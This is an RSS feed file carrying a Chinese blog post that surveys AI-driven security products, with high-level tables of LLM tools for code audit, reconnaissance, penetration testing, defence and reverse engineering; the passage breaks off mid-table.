rss.xml

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Pico Org</title><description>Pico组织博客</description><link>https://picoorg.github.io/</link><language>zh_CN</language><item><title>AI安全之路--开篇</title><link>https://picoorg.github.io/posts/ai%E5%AE%89%E5%85%A8/</link><guid isPermaLink="true">https://picoorg.github.io/posts/ai%E5%AE%89%E5%85%A8/</guid><description>梳理各类AI产品思路。</description><pubDate>Wed, 19 Feb 2025 00:00:00 GMT</pubDate><content:encoded>&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#1-%E5%BC%80%E7%AF%87&quot;&gt;1. 开篇&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#11-ai%E7%BB%99%E5%AE%89%E5%85%A8%E5%B8%A6%E6%9D%A5%E4%BA%86%E4%BB%80%E4%B9%88&quot;&gt;1.1. AI给安全带来了什么&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#12-ai%E5%AE%89%E5%85%A8%E4%BA%A7%E5%93%81%E5%BD%A2%E5%BC%8F%E9%A2%84%E6%B5%8B&quot;&gt;1.2. AI安全产品形式预测&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2-ai%E5%AE%89%E5%85%A8%E4%BA%A7%E5%93%81&quot;&gt;2. AI安全产品&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#21-%E5%AE%89%E5%85%A8%E7%9A%84ai&quot;&gt;2.1. 安全的AI&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#211-%E6%A8%A1%E5%9E%8B%E8%AE%AD%E7%BB%83&quot;&gt;2.1.1. 模型训练&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#212-%E6%A8%A1%E5%9E%8B%E4%BC%98%E5%8C%96&quot;&gt;2.1.2. 模型优化&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#2121-llama-factory&quot;&gt;2.1.2.1. LLaMA-Factory&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#213-%E5%BA%94%E7%94%A8%E6%A1%86%E6%9E%B6&quot;&gt;2.1.3. 应用框架&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#214-%E5%85%B7%E4%BD%93%E5%BA%94%E7%94%A8&quot;&gt;2.1.4. 具体应用&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#22-%E5%AE%89%E5%85%A8%E6%8F%90%E6%95%88&quot;&gt;2.2. 安全提效&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#221-deepseekselftool&quot;&gt;2.2.1. DeepSeekSelfTool&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#23-%E5%AE%89%E5%85%A8%E6%8E%A2%E7%B4%A2&quot;&gt;2.3. 安全探索&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#autoaudit&quot;&gt;AutoAudit&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3-%E5%B1%95%E6%9C%9B&quot;&gt;3. 展望&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4-%E5%8F%82%E8%80%83%E6%96%87%E7%8C%AE&quot;&gt;4. 参考文献&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#401-%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B8%8E%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90s&quot;&gt;4.0.1. 代码审计与漏洞分析s&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#402-%E7%BD%91%E7%BB%9C%E4%BE%A6%E5%AF%9F%E4%B8%8E%E5%A8%81%E8%83%81%E6%83%85%E6%8A%A5&quot;&gt;4.0.2. 网络侦察与威胁情报&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#403-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%8E%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8&quot;&gt;4.0.3. 渗透测试与漏洞利用&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#404-%E5%AE%89%E5%85%A8%E6%A3%80%E6%B5%8B%E4%B8%8E%E9%98%B2%E5%BE%A1&quot;&gt;4.0.4. 安全检测与防御&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#405-%E9%80%86%E5%90%91%E5%B7%A5%E7%A8%8B%E4%B8%8E%E8%87%AA%E5%8A%A8%E5%8C%96&quot;&gt;4.0.5. 逆向工程与自动化&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#406-%E5%8E%82%E5%95%86ai&quot;&gt;4.0.6. 厂商AI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#407-7llm%E5%BA%94%E7%94%A8%E4%BE%A7&quot;&gt;4.0.7. 7.LLM应用侧&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;1. 开篇&lt;/h1&gt;
&lt;p&gt;如果说当下及未来十年或是几十年最具想象力的技术方向，那&lt;code&gt;AI&lt;/code&gt;一定占有一席之地。本文讨论的内容站在安全视角探索产品发展路线，同样的思路可以扩展到各个领域。&lt;/p&gt;
&lt;h2&gt;1.1. AI给安全带来了什么&lt;/h2&gt;
&lt;p&gt;“安全的AI和AI促进安全”是老生常谈的一个观点，包括偶然机会和某位大咖（头部安全实验室负责人）聊天也提到。观点没有错，但是过于浮在空中落不了地，同样的模板我想也能套用到未来的新领域。&lt;/p&gt;
&lt;p&gt;具体来讲可预见的有以下内容：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;安全的AI：模型训练场景，模型优化场景，应用框架场景，具体应用场景四类场景下的各种风险管理。&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;ai%E6%9E%B6%E6%9E%84.jpg&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;安全提效：IT相关的三大场景安全能力去人力化，包含基础设施场景，数据场景，以及在前两者之上抽象出的各类业务场景。&lt;/li&gt;
&lt;li&gt;安全探索：填补因脑力局限而错失的各类安全交叉领域的空白。&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;1.2. AI安全产品形式预测&lt;/h2&gt;
&lt;p&gt;我认为AI并不能做出超越预料范围的创新，就像人类无法创造出从未见过的事物。因此，不能过分期望用&lt;code&gt;AI&lt;/code&gt;解决创新问题，而是如何创新地用好&lt;code&gt;AI&lt;/code&gt;。&lt;/p&gt;
&lt;p&gt;&lt;code&gt;AI&lt;/code&gt;的优劣势分析：&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;优势&lt;/th&gt;
&lt;th&gt;劣势&lt;/th&gt;
&lt;th&gt;分析&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;没有上限的学习能力&lt;/td&gt;
&lt;td&gt;成为全领域专家成本指数增长&lt;/td&gt;
&lt;td&gt;适合成为某一领域专家&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;优秀的推理能力&lt;/td&gt;
&lt;td&gt;准确性依赖于人类输入&lt;/td&gt;
&lt;td&gt;适合做分析类工作，但需要人类指导&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;归纳起来可能有两类产品方向：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;提效类：将人类活动抽象成复杂的调度问题，用&lt;code&gt;AI&lt;/code&gt;替换掉某些简单决策即可完成的事项。&lt;/li&gt;
&lt;li&gt;探索类：通过不断的输入标注数据，实现“一超多能”的单领域&lt;code&gt;T&lt;/code&gt;型专家。&lt;/li&gt;
&lt;/ol&gt;
&lt;h1&gt;2. AI安全产品&lt;/h1&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;产品&lt;/th&gt;
&lt;th&gt;方向&lt;/th&gt;
&lt;th&gt;本质&lt;/th&gt;
&lt;th&gt;定位&lt;/th&gt;
&lt;th&gt;优势&lt;/th&gt;
&lt;th&gt;级别&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;LLaMA-Factory&lt;/td&gt;
&lt;td&gt;模型优化&lt;/td&gt;
&lt;td&gt;sft算法整合&lt;/td&gt;
&lt;td&gt;模型微调工具&lt;/td&gt;
&lt;td&gt;整合及易用&lt;/td&gt;
&lt;td&gt;100k-1m&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DeepSeekSelfTool&lt;/td&gt;
&lt;td&gt;安全提效&lt;/td&gt;
&lt;td&gt;prompt&lt;/td&gt;
&lt;td&gt;蓝队Agent&lt;/td&gt;
&lt;td&gt;易用UI&lt;/td&gt;
&lt;td&gt;100-1k&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AutoAudit&lt;/td&gt;
&lt;td&gt;安全探索&lt;/td&gt;
&lt;td&gt;prompt+sft&lt;/td&gt;
&lt;td&gt;代码分析&lt;/td&gt;
&lt;td&gt;模型迭代&lt;/td&gt;
&lt;td&gt;100-1k&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;2.1. 安全的AI&lt;/h2&gt;
&lt;h3&gt;2.1.1. 模型训练&lt;/h3&gt;
&lt;h3&gt;2.1.2. 模型优化&lt;/h3&gt;
&lt;h4&gt;2.1.2.1. LLaMA-Factory&lt;/h4&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/hiyouga/LLaMA-Factory&quot;&gt;LLaMA-Factory&lt;/a&gt;是一个整合了多种微调技术的产品，包括LoRA等，涵盖了多种模型的适配，包括DeepSeek等。很明显其优势在于降低了非算法同学微调模型的门槛。&lt;/p&gt;
&lt;h3&gt;2.1.3. 应用框架&lt;/h3&gt;
&lt;h3&gt;2.1.4. 具体应用&lt;/h3&gt;
&lt;h2&gt;2.2. 安全提效&lt;/h2&gt;
&lt;h3&gt;2.2.1. DeepSeekSelfTool&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ChinaRan0/DeepSeekSelfTool/&quot;&gt;DeepSeekSelfTool&lt;/a&gt;虽然有一定的标注输入数据，但仍是一个比较标准的基于&lt;code&gt;prompt&lt;/code&gt;的安全工具，用于分析各类流量、进程、文件等信息的安全风险。在&lt;a href=&quot;https://mp.weixin.qq.com/s/QpGlIrf4fA0JOefBorD2wg&quot;&gt;基于deepseek的安全分析工具设计实践&lt;/a&gt;一文中有比较详细的使用方法介绍，属于蓝队专家角色的&lt;code&gt;Agent&lt;/code&gt;，产品优势在于考虑到用户普适性。&lt;/p&gt;
&lt;h2&gt;2.3. 安全探索&lt;/h2&gt;
&lt;h3&gt;AutoAudit&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/ddzipp/AutoAudit&quot;&gt;AutoAudit&lt;/a&gt;是具有探索性质雏形的工具，其优势在于通过数据集标注微调模型，进而实现安全漏洞分析覆盖，缺点也比较明显使用的微调框架比较受限。&lt;/p&gt;
&lt;h1&gt;3. 展望&lt;/h1&gt;
&lt;h1&gt;4. 参考文献&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/Acmesec/theAIMythbook&quot;&gt;Ai迷思录（应用与安全指南）&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;4.0.1. 代码审计与漏洞分析s&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;工具名称&lt;/th&gt;
&lt;th&gt;产品原理&lt;/th&gt;
&lt;th&gt;应用场景&lt;/th&gt;
&lt;th&gt;存疑思考&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AutoAudit&lt;/td&gt;
&lt;td&gt;基于LLM，分析代码、配置文件等，识别安全漏洞或不合规行为。&lt;/td&gt;
&lt;td&gt;代码审计、配置审查、合规性检查、漏洞早期发现。&lt;/td&gt;
&lt;td&gt;准确性依赖模型，可能有误报漏报。对复杂或新型漏洞识别能力有限。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SourceGPT&lt;/td&gt;
&lt;td&gt;利用ChatGPT作为预言机，结合提示工程和代码分析技术。&lt;/td&gt;
&lt;td&gt;辅助代码审查、安全漏洞识别、代码理解、生成安全文档。&lt;/td&gt;
&lt;td&gt;依赖ChatGPT理解能力。提示工程质量影响结果。可能有幻觉问题。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;vulnhuntr&lt;/td&gt;
&lt;td&gt;使用LLM进行零样本漏洞发现，利用LLM的泛化能力。&lt;/td&gt;
&lt;td&gt;未知漏洞发现、安全研究、自动化漏洞挖掘。&lt;/td&gt;
&lt;td&gt;零样本学习效果可能不稳定。可能产生大量误报。缺乏可信度。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ChatGPTScanner&lt;/td&gt;
&lt;td&gt;基于ChatGPT的代码扫描器，将代码片段输入ChatGPT进行分析。&lt;/td&gt;
&lt;td&gt;快速代码审查、漏洞初步筛查、安全教育。&lt;/td&gt;
&lt;td&gt;依赖ChatGPT漏洞识别能力。无法处理大型代码库。Prompt影响大。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;chatgpt-code-analyzer&lt;/td&gt;
&lt;td&gt;类似ChatGPTScanner，集成到VS Code中。&lt;/td&gt;
&lt;td&gt;开发过程中实时代码分析、漏洞提示。&lt;/td&gt;
&lt;td&gt;同ChatGPTScanner。可能影响开发效率。IDE集成有安全风险。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;黑客 AI&lt;/td&gt;
&lt;td&gt;在线工具，通过AI模型分析上传的代码，检测漏洞。&lt;/td&gt;
&lt;td&gt;快速漏洞检测、无需安装。&lt;/td&gt;
&lt;td&gt;数据隐私安全风险。透明度低。可能需付费。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;audit_gpt&lt;/td&gt;
&lt;td&gt;针对智能合约进行微调的GPT模型。&lt;/td&gt;
&lt;td&gt;智能合约审计、漏洞检测、安全加固。&lt;/td&gt;
&lt;td&gt;效果依赖微调数据。难适应语言快速发展。对新型漏洞识别有限。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;vulchatgpt&lt;/td&gt;
&lt;td&gt;结合IDA Pro的HexRays反编译器和ChatGPT。&lt;/td&gt;
&lt;td&gt;二进制文件漏洞分析、逆向工程辅助、恶意软件分析。&lt;/td&gt;
&lt;td&gt;依赖反编译准确性和ChatGPT分析。难处理复杂二进制或混淆代码。需IDA Pro和ChatGPT授权。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ret2GPT&lt;/td&gt;
&lt;td&gt;利用LangChain和OpenAI API，构建知识图谱或语义分析模型。&lt;/td&gt;
&lt;td&gt;CTF比赛、二进制漏洞分析、安全研究。&lt;/td&gt;
&lt;td&gt;依赖LangChain和OpenAI API。可能需高计算资源。对复杂漏洞识别有限。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AuthzAI&lt;/td&gt;
&lt;td&gt;利用OpenAI结构化输出能力，对比API端点预期权限模型与实际行为。&lt;/td&gt;
&lt;td&gt;API安全测试、权限验证、访问控制审计。&lt;/td&gt;
&lt;td&gt;依赖OpenAI结构化输出和权限模型理解。难处理复杂权限逻辑。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SinkFinder&lt;/td&gt;
&lt;td&gt;结合LLM和静态代码分析，评估数据流安全性。&lt;/td&gt;
&lt;td&gt;静态代码分析、漏洞挖掘、数据流分析。&lt;/td&gt;
&lt;td&gt;依赖LLM对代码上下文理解和安全漏洞识别。可能有误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Callisto&lt;/td&gt;
&lt;td&gt;结合Ghidra、Semgrep和GPT进行自动化二进制漏洞分析。&lt;/td&gt;
&lt;td&gt;二进制文件分析、漏洞挖掘。&lt;/td&gt;
&lt;td&gt;准确性依赖多组件。复杂漏洞需人工复核。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CodeScanGPT&lt;/td&gt;
&lt;td&gt;实验性的工具，通过GPT和OpenAPI实现对目标代码的安全漏洞扫描&lt;/td&gt;
&lt;td&gt;快速的进行代码的安全扫描实验&lt;/td&gt;
&lt;td&gt;效果受限于GPT的能力。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLM-CodeSecurityReviewer&lt;/td&gt;
&lt;td&gt;一个可以辅助检查代码安全性的工具&lt;/td&gt;
&lt;td&gt;快速的分析并评估代码的安全风险&lt;/td&gt;
&lt;td&gt;需要自行搭建环境&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;4.0.2. 网络侦察与威胁情报&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;工具名称&lt;/th&gt;
&lt;th&gt;产品原理&lt;/th&gt;
&lt;th&gt;应用场景&lt;/th&gt;
&lt;th&gt;存疑思考&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CensysGPT 测试版&lt;/td&gt;
&lt;td&gt;利用Censys数据和GPT模型，通过自然语言查询获取信息并分析。&lt;/td&gt;
&lt;td&gt;威胁情报、资产发现、风险评估。&lt;/td&gt;
&lt;td&gt;依赖Censys数据和GPT分析。受限于Censys覆盖。对新型威胁识别有限。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GPT_Vuln分析器&lt;/td&gt;
&lt;td&gt;结合Nmap、DNS Recon和GPT模型，分析信息生成漏洞报告。&lt;/td&gt;
&lt;td&gt;漏洞扫描、网络安全评估、自动化报告。&lt;/td&gt;
&lt;td&gt;依赖各组件准确性。可能有误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SubGPT&lt;/td&gt;
&lt;td&gt;利用BingGPT分析已知子域名，发现更多子域名。&lt;/td&gt;
&lt;td&gt;子域名枚举、资产发现、攻击面管理。&lt;/td&gt;
&lt;td&gt;依赖BingGPT。受限Bing索引。对不常见子域名发现有限。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Navi&lt;/td&gt;
&lt;td&gt;基于问答的侦察工具，通过与用户交互分析信息。&lt;/td&gt;
&lt;td&gt;交互式侦察、信息收集、威胁评估。&lt;/td&gt;
&lt;td&gt;依赖用户安全知识和GPT分析。有误导风险。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ChatCVE&lt;/td&gt;
&lt;td&gt;利用LLM处理CVE信息，进行分类、聚合等。&lt;/td&gt;
&lt;td&gt;CVE信息管理、漏洞优先级排序、安全研究。&lt;/td&gt;
&lt;td&gt;依赖LLM对CVE描述理解。对新CVE或非标准描述处理不佳。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ZoomEyeGPT&lt;/td&gt;
&lt;td&gt;基于GPT的ZoomEye浏览器扩展，增强搜索体验和AI辅助分析。&lt;/td&gt;
&lt;td&gt;网络空间搜索引擎增强、资产发现、威胁情报。&lt;/td&gt;
&lt;td&gt;依赖ZoomEye数据和GPT分析。受限ZoomEye覆盖。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;uncover-turbo&lt;/td&gt;
&lt;td&gt;将自然语言查询转换为测绘语法（如Shodan、Censys）。&lt;/td&gt;
&lt;td&gt;网络空间测绘、资产发现、漏洞扫描。&lt;/td&gt;
&lt;td&gt;依赖LLM理解查询和测绘语法。可能有转换错误。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;nmap-GPT&lt;/td&gt;
&lt;td&gt;结合nmap与GPT，进行安全检查&lt;/td&gt;
&lt;td&gt;增强的扫描体验&lt;/td&gt;
&lt;td&gt;依赖GPT进行扫描后处理&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;4.0.3. 渗透测试与漏洞利用&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;工具名称&lt;/th&gt;
&lt;th&gt;产品原理&lt;/th&gt;
&lt;th&gt;应用场景&lt;/th&gt;
&lt;th&gt;存疑思考&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;PentestGPT&lt;/td&gt;
&lt;td&gt;利用GPT模型生成攻击脚本、分析漏洞报告、提供建议。&lt;/td&gt;
&lt;td&gt;自动化渗透测试、漏洞利用、安全评估。&lt;/td&gt;
&lt;td&gt;依赖GPT安全知识和能力。可能有误报漏报。脚本有风险。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;burpgpt&lt;/td&gt;
&lt;td&gt;将GPT集成到Burp Suite，分析HTTP请求和响应。&lt;/td&gt;
&lt;td&gt;Web应用安全测试、漏洞发现、动态分析。&lt;/td&gt;
&lt;td&gt;依赖GPT漏洞识别和Burp配置。可能有误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ReconAIzer&lt;/td&gt;
&lt;td&gt;类似burpgpt，集成GPT到Burp Suite，辅助漏洞赏金侦查。&lt;/td&gt;
&lt;td&gt;漏洞赏金、Web应用安全测试、漏洞发现。&lt;/td&gt;
&lt;td&gt;同burpgpt。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CodaMOSA&lt;/td&gt;
&lt;td&gt;将OpenAI API集成到模糊测试器，生成更有效测试用例。&lt;/td&gt;
&lt;td&gt;模糊测试、漏洞挖掘、软件安全测试。&lt;/td&gt;
&lt;td&gt;依赖OpenAI API。需高计算资源。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PassGAN&lt;/td&gt;
&lt;td&gt;基于深度学习的密码猜测工具，生成更符合真实密码分布的字典。&lt;/td&gt;
&lt;td&gt;密码破解、密码强度评估、安全研究。&lt;/td&gt;
&lt;td&gt;依赖训练数据。可能生成弱密码。可能被滥用。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;nuclei-ai-extension&lt;/td&gt;
&lt;td&gt;利用AI生成Nuclei模板，自动生成YAML配置。&lt;/td&gt;
&lt;td&gt;自动化漏洞扫描、快速生成扫描规则。&lt;/td&gt;
&lt;td&gt;依赖AI模板生成能力。模板可能不准确。需准确漏洞信息。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;nuclei_gpt&lt;/td&gt;
&lt;td&gt;类似nuclei-ai-extension，通过提交请求、响应和描述生成Nuclei PoC。&lt;/td&gt;
&lt;td&gt;自动化漏洞扫描、快速生成PoC。&lt;/td&gt;
&lt;td&gt;依赖GPT PoC生成能力。PoC可能不准确。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Nuclei Templates AI 生成器&lt;/td&gt;
&lt;td&gt;通过文本描述生成Nuclei模板。&lt;/td&gt;
&lt;td&gt;自动化漏洞扫描、快速生成扫描规则。&lt;/td&gt;
&lt;td&gt;依赖LLM理解描述和Nuclei语法。模板可能不准确。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;hackGPT&lt;/td&gt;
&lt;td&gt;利用OpenAI和ChatGPT进行黑客活动。&lt;/td&gt;
&lt;td&gt;安全研究、渗透测试、漏洞利用（慎用）。&lt;/td&gt;
&lt;td&gt;道德法律风险。可能被滥用。依赖OpenAI/ChatGPT能力。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AutorizePro&lt;/td&gt;
&lt;td&gt;Burp Suite的授权强制检测扩展，结合AI分析。&lt;/td&gt;
&lt;td&gt;Web应用安全测试、权限验证、访问控制。&lt;/td&gt;
&lt;td&gt;依赖AI权限分析。可能有误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AISploit&lt;/td&gt;
&lt;td&gt;辅助测试人员的AI测试工具&lt;/td&gt;
&lt;td&gt;可以利用大模型更快地进行测试，更有效地规划渗透路径&lt;/td&gt;
&lt;td&gt;很依赖LLM的能力和微调数据集&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;4.0.4. 安全检测与防御&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;工具名称&lt;/th&gt;
&lt;th&gt;产品原理&lt;/th&gt;
&lt;th&gt;应用场景&lt;/th&gt;
&lt;th&gt;存疑思考&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;k8sgpt&lt;/td&gt;
&lt;td&gt;利用LLM分析Kubernetes集群问题，分析日志、配置等。&lt;/td&gt;
&lt;td&gt;Kubernetes集群故障排除、配置审查、安全加固。&lt;/td&gt;
&lt;td&gt;依赖LLM对K8s知识掌握。可能有误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;cloudgpt&lt;/td&gt;
&lt;td&gt;利用ChatGPT扫描AWS客户托管策略漏洞。&lt;/td&gt;
&lt;td&gt;AWS安全审计、策略审查、合规性检查。&lt;/td&gt;
&lt;td&gt;依赖ChatGPT对AWS策略理解。可能有误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IATelligence&lt;/td&gt;
&lt;td&gt;提取PE文件的IAT并请求GPT分析，识别恶意行为或ATT&amp;amp;CK技术。&lt;/td&gt;
&lt;td&gt;恶意软件分析、威胁情报、逆向工程。&lt;/td&gt;
&lt;td&gt;依赖GPT对API调用理解。可能有误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;rebuff&lt;/td&gt;
&lt;td&gt;检测提示注入攻击，分析输入识别恶意提示。&lt;/td&gt;
&lt;td&gt;LLM安全防护、提示注入防御、内容过滤。&lt;/td&gt;
&lt;td&gt;依赖检测算法。可能有误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLMFuzzer&lt;/td&gt;
&lt;td&gt;针对LLM的模糊测试框架，生成各种输入测试LLM。&lt;/td&gt;
&lt;td&gt;LLM安全测试、漏洞发现、鲁棒性评估。&lt;/td&gt;
&lt;td&gt;依赖模糊测试算法。需大量计算资源。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vigil&lt;/td&gt;
&lt;td&gt;提示注入检测和LLM提示安全扫描。&lt;/td&gt;
&lt;td&gt;LLM安全防护、提示注入防御、内容过滤。&lt;/td&gt;
&lt;td&gt;依赖检测算法。可能有误报漏报。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Garak&lt;/td&gt;
&lt;td&gt;开源的LLM漏洞扫描器，评估并分析LLM及相关应用程序的安全漏洞。&lt;/td&gt;
&lt;td&gt;LLM漏洞分析&lt;/td&gt;
&lt;td&gt;该项目的效果受限于所使用的LLM模型的类型和能力。可能不适用最新模型或安全技术。需要大量计算资源来处理大型模型和复杂漏洞扫描。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLM-SOC&lt;/td&gt;
&lt;td&gt;一个RAG框架的LLM工具，集成多种安全工具&lt;/td&gt;
&lt;td&gt;增强SOC的效率和分析&lt;/td&gt;
&lt;td&gt;目前仍在开发&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;4.0.5. 逆向工程与自动化&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;工具名称&lt;/th&gt;
&lt;th&gt;产品原理&lt;/th&gt;
&lt;th&gt;应用场景&lt;/th&gt;
&lt;th&gt;存疑思考&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;LLM4Decompile&lt;/td&gt;
&lt;td&gt;利用LLM将机器代码生成高级语言形式。&lt;/td&gt;
&lt;td&gt;二进制代码反编译、恶意软件分析、漏洞挖掘。&lt;/td&gt;
&lt;td&gt;准确性和可读性受LLM限制。对复杂代码效果可能不佳。&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
